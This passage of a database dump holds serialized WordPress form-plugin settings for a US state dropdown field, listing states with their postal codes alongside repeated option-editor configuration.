Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:51:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 